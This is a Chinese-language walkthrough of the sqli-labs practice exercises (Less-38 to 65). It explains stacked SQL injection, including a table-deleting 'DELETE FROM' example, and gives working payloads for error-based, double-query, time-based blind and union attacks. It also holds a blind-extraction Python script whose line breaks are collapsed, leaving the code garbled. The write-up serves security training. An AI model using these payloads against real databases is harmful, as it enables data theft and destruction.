知识点:
1.堆叠注入原理(stacked injection)
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。
1.1与union查询区别
而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。
1.2使用实例
例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
1.3使用条件
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行。
大多数时候,因为API或数据库引擎的不支持,堆叠注入都无法实现。
less38:
堆叠注入:也就是可以执行多条sql语句
http://127.0.0.1/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
less39 堆叠注入
语句都一样,重点是找到闭合的方式
?id=1;insert into users(id,username,password) values (16,‘a’,‘a’)–+
less40盲注,字符型
?id=1'); insert into users(id,username,password) values ('17','a','a')--+
less41 盲注,数字型
1; insert into users(id,username,password) values(18,'b','b') --+
less42
经过验证,在password处语句报错,所以我们需要从passowrd入手
0';create table aaa like users #
less43
和 42 类似 同样password 未过滤
login_user=1&login_password=a’);create table less43 like users#&mysubmit=Login
less44 POST - Error based - String - Stacked -Blind
login_user=a&login_password=a';insert into users(id,username,password) values(19,'a','a') --+&mysubmit=Login
less45- Error based - String - Stacked - Blind
login_user=a&login_password=a’); insert into users(id,username,password) values(20,’‘c’,‘c’) --+&mysubmit=Login
Less-46 ORDER BY-Error-Numeric
终于迎来了一个过渡
这次的注入是通过order by 来进行的
通过sort 查询 发现当输入4的时候报错,而报错提示与order by 提示相同,猜想可能是将输入的值插入order by里进行的
通过updatexml 报错注入
sort=4 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23
Less-47 ORDER BY Clause-Error-Single quote
和46有少许区别,做到这里基本套路应该都懂了,从不需要单引号,双引号之类的报错,到盲注,难度都是一步一步深入
sort=4’ and (select count(*) from information_schema.columns group by concat(0x7e,(select database()),0x7e,floor(rand(0)*2))) --+
注意 and后面的语句要使用()括起来
基于 procedure analyse 注入
sort=1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+
Less-48 ORDER BY Clause Blind based
这一题 需要使用盲注解决
通过substr获取所要查询的信息的位数
然后使用ascii去解析成ascii编码
之后通过if判断是否相等 去获取值
之后构成 if(ascii(substr(datbase(),1,1)))
或者使用rand(ascii(left(database,1))=115) 同样获取相同的效果
Less-49 ORDER BY Clause Blind based
同样是盲注,和48类似
这一题使用延时盲注解决
获取长度
?id=1 and if(length(database())=8,sleep(5),0)--+
获取值
?id=1 and If(ascii(substr(database(),1,1))=114,0,sleep (5))--+
Less-50 ORDER BY Clause Blind based
检测 返回只有正确或者错误,属于盲注
通过报错注入 也能获取
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
Less-51 ORDER BY Clause Blind based
sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
Less-52 ORDER BY Clause Blind based
测试发现均没有显错 只能盲注了
1 and if(length(database())=8,sleep(5),0) --+
Less - 53 ORDER BY Clause Blind based
通过测试发现回显只有正确和错误,所以这道题做法基本就是盲注了,
id=4' and if(length(database()) = 8 ,0,sleep(6)) --+
id=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
id=1' and (ascii(substr((select database()) ,1,1))) = 114 and if(1=1, sleep(1), n
Less-54 GET-challenge-Union-10 queries allowed-Variation 1
挑战 ,允许查询10次,先不急去查看,观察一下需要输入的内容
所以,我们只有10次机会,
一般获取一个表正常需要获取数据库,到表,到列,再到数据,所以最少需要4步,而这里我们需要用6步猜测出来注入
回忆一下前面的注入, get类型的包含但不限于单引号,双引号,bool,堆叠,延时,报错,字符型和数字型,双注。
第一道题 采用最简单的’注入
?id=1%27%20order%20by%203%20%23 // True
?id=1%27%20order%20by%204%20%23 // false
?id=0%27%20union%20select%201,2,database()%20%23 // True challenges
?id=0%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20%23 // True 8T3YRE3TXR
?id=0%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%278T3YRE3TXR%27%20%23// true secret_4XCQ
?id=0%27%20union%20select%201,2,group_concat(s
Less-55 GET-challenge-Union-14 queries allowed-Variation 2
线索: 告诉了测试次数14次, union测试 数据库challenges
第一次挑战 失败
’ " ') ") 均没有回显 初次猜测报错注入或者双注
第二次尝试
) 闭合
获取表
=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23 // True UBU4QNRHHP
获取列
id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='UBU4QNRHHP' %23 //true
// secret_6H3B
获取key
0) union select 1,2,group_concat(secret_6H3B) from UBU4QNRHHP %23
mLjAsOZnSEbQqIMybw1AnUYH
Less-56 GET-challenge-Union-14 queries allowed-Variation 3
这次老老实实绕过
id=1' %23 // False
id=1" %23 // True 但是注入 union报错
添加为
id=1' union select 1,2,3 %23 // False
id=1" union select 1,2,3 %23 //False
id=1') union select 1,2,3 %23
获取表
0%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23
KOUNR4QC6G
获取列
0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='KOUNR4QC6G'%23
secret_3EVD
获取key
0') union select 1,2,group_concat(secret_3EVD) from KOUNR4QC6G %23
KcU87wBerjRPTHsvWBL6Zpx1
Less-57 GET-challenge-Union-14 queries allowed-Variation 4
做法 和之前一样
0" union select 1,2,3 %23
通过改变0之后的值达到闭合的目的
获取表
0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23
VAFBXAV18O
获取列
0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='VAFBXAV18O'%23
secret_G8PM
获取key
0" union select 1,2,group_concat(secret_G8PM) from VAFBXAV18O %23
dRwHUUQ2TXSGUZ556g7FikFJ
Less-58 GET-challenge-Double Query-5 queries allowed-Variation 1
这道题 不看题目可能需要测好久
这次使用双注来报错查询
?id=1%27and%20%271%27=%271 // True绕过
获取表
1'and (select count(*) from information_schema.tables group by concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~',floor(rand(0)*2))) %23
5H512U9U27
获取列
1'and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='5H512U9U27' limit 2,1),'~',floor(rand(0)*2))) %23
secret_DD13
获取key
1'and (select count(*) from information_schema.tables group by concat('~',(select secret_BJYY from 9JMRBSMHB3 limit 0,1),'~',floor(rand(0)*2))) %23
fJw5d5MfwbirBtiV6ajyMVYL
Less-59 GET-challenge-Double Query-5 queries allowed-Variation 2
先测试类型
有报错,可以注入
这次不需要过滤
获取表
1 and (select count(*) from information_schema.tables group by concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~',floor(rand(0)*2))) %23
N6JFY84247
获取列
1 and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='N6JFY84247' limit 2,1),'~',floor(rand(0)*2))) %23
secret_FWQ3
获取key
1 and (select count(*) from information_schema.tables group by concat('~',(select secret_FWQ3 from N6JFY84247 limit 0,1),'~',floor(rand(0)*2))) %23
VlWMK389WVuIephCe46vDls5
Less-60 GET-challenge-Double Query-5 queries allowed-Variation 3
测试 单引号 双引号 ) ') “) 发现”) 闭合 绕过
获取表
?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),%27~%27,floor(rand(0)*2)))%20%23
5H36JXB2F0
获取 列
?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%275H36JXB2F0%27%20limit%202,1),%27~%27,floor(rand(0)*2)))%20%23
secret_NFL6
获取key
?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20secret_NFL6%20from%205H36JXB2F0%20limit%200,1),%27~%27,floor(rand(0)*2)))%20%23
49DYkkaArpuMaYb5ITI6NYlP
Less-61 GET-challenge-Double Query-5 queries allowed-Variation 4
通过1’ 判断闭合
获取表
1%
27))%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),%27~%27,floor(rand(0)*2)))%20%23
EKP9EVPEDH
获取列
1')) and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database()%20 and table_name='EKP9EVPEDH' limit 2,1),'~',floor(rand(0)*2))) %23
secret_DI64
获取key
1')) and (select count(*) from information_schema.tables group by concat('~',(select secret_DI64 from EKP9EVPEDH ),'~',floor(rand(0)*2))) %23
8r5XPen1KywllEINiQfAQnlq
Less-62 GET-challenge-Blind- 130 queries allowed -variation 1
高能警告,大佬脚本:
## 这里通过 ') %23 可构成闭合from urllib import request
from urllib import parse
import reurl ='http://192.168.64.135/Less-62/?id='# length
num = 0
for i in range(1,20):num +=1param = '1 \') and (length(database())='+str(i)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()if (re.search("Angelina",response)):print("length:" + str(i))breakdatabase = ""
for i in range(10):a = b =64while True:num +=1b = int(b/2)param = '1 \') and (ascii(substr(database(),'+str(i+1)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()#print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr(database(),' + str(i+1) + ',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()#print(url + parse.quote(param))if (re.search("Angelina", response)):database +=chr(a)breakelse:a +=bprint(database)之后爆破表 这一题写个完整的,之后就简略的写出注入点,
爆破表,拿上面的修修改改
通过检查,先确定表的长度,再去爆破
爆破前记得重置,因为130次比较少
# 查表的数量
table_num = 0while True:param = "1 ') and (select count(*) from information_schema.tables where table_schema=database())="+str(table_num)+" #"response = request.urlopen(url + parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina",response)):print("table_num:"+str(table_num))breakelse:table_num += 1
print(table_num)# # 确定表的长度
table_length = 0
while True:param = '1 \') and length(substr((select table_name from information_schema.tables where table_schema=database()),1))='+str(table_length)+' #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):print("table_num:" + str(table_length))breakelse:table_length += 1# 获取表名
table_name=""
for i in range(1,11):a=b=64while True:b= int(b/2)param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_schema=database()),'+str(i)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_schema=database()),'+str(i)+',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()print(url + parse.quote(param))if (re.search("Angelina", response)):table_name +=chr(a)breakelse:a +=bprint(table_name)J8CLO25SRR最后查列,这里发现写的脚本比较费时,所以稍微修改一下
column_name =""
for i in range(7,11):a=b=64while True:b= int(b/2)param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_name="'+str(table_name)+'"),'+str(i)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_name="'+str(table_name)+'"),'+str(i)+',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()print(url + parse.quote(param))if (re.search("Angelina", response)):column_name +=chr(a)breakelse:a +=b
#HKIR
print(column_name)
column_name = "secret_"+column_name# 查 key
for i in range(1,25):a=b=64while True:b= int(b/2)param = '1 \') and (ascii(substr((select '+column_name+' from '+table_name+'),'+str(i)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr((select '+column_name+' from '+table_name+')),'+str(i)+',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()print(url + parse.quote(param))if (re.search("Angelina", response)):key +=chr(a)breakelse:a +=b
Less-63 GET-challenge-Blind- 130 queries allowed -variation 2
和上一题类似
这里就判断注入类型,和如何闭合
1’ order by 4 %23
通过判断 发现3 返回正常 4 错误
所以之后的做法就和62 一样
Less-64 GET-challenge-Blind- 130 queries allowed -variation 3
测试了 ’ " ) )) ') ") ')) "))
1)) order by 3 %23 闭合
Less-65 GET-challenge-Blind- 130 queries allowed -variation 4
和上一题一样,通过测试闭合
发现 ") 绕过 闭合
这里还有一种做法,将需要绕过的写入txt文件,之后通过burp去爆破,通过判断返回值也可以达到相同的
